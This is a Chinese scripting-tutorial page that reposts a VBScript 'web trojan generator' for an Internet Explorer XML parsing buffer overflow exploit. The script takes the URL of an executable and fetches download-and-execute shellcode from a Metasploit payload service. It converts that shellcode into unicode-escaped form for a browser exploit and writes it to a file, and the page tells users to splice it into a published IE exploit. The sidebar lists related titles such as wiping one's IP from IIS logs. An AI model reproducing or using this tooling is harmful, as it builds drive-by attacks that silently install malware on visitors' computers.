当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > 网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

VBScript
用vbs清空iis log 中自己登录ip的记录
vbs sendmail发邮件带附件方法
用vbs通过135端口执行命令的脚本
用vbs实现的瞬间关闭多个系统进程的脚本
vbs 中调用shell.application 简单函数
vbs wmi获取电脑硬件信息实例
用vbscript实现隐藏任务栏图标的脚本
vbs正则表达式代码
vbs版IP地理位置查询小偷
超级厉害的VBS定时提醒脚本 Remind.vbs
vbs实现的支持拖动的txt文本切割器
VBS如何察看或获得剪切板内容的脚本
VBS备忘录启动代码
VBS脚本使用WMI操作注册表的代码
vbs xmldom初次实战获取QQ签名的代码
VBS破坏性应用代码
vbs生成ACCESS数据里所有表的字段
vbs实现的图片自适应表格,目前最佳解决方案!
ProcessMagnifier.vbs进程查看
用于提取网易文件的hta代码

VBScript 中的 网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-12   浏览: 217 ::
收藏到网摘: n/a

MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day利用代码 'code by lcx
On Error Resume Next
Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload"

Body = getHTTPPage(url)
Set Re = New RegExp
Re.Pattern = "(\$shellcode \=[\s\S]+</div></pre>)"
Set Matches = Re.Execute(Body)
If Matches.Count>0 Then Body = Matches(0).value
code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))
function replaceregex(str)
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function

Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function
Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function
Function URLEncoding(vstrIn)
strReturn = ""
For aaaa = 1 To Len(vstrIn)
ThisChr = Mid(vStrIn,aaaa,1)
If Abs(Asc(ThisChr)) < &HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc(ThisChr)
If innerCode < 0 Then
innerCode = innerCode + &H10000
End If
Hight8 = (innerCode And &HFF00)\ &HFF
Low8 = innerCode And &HFF
strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
End If
Next
URLEncoding = strReturn
End Function
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("a.txt",2,true)
fileS.writeline replaceregex(code)
'fileS.writeline body
wscript.echo replaceregex(code)
files.close
set fso=Nothing
wscript.echo Chr(13)&"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"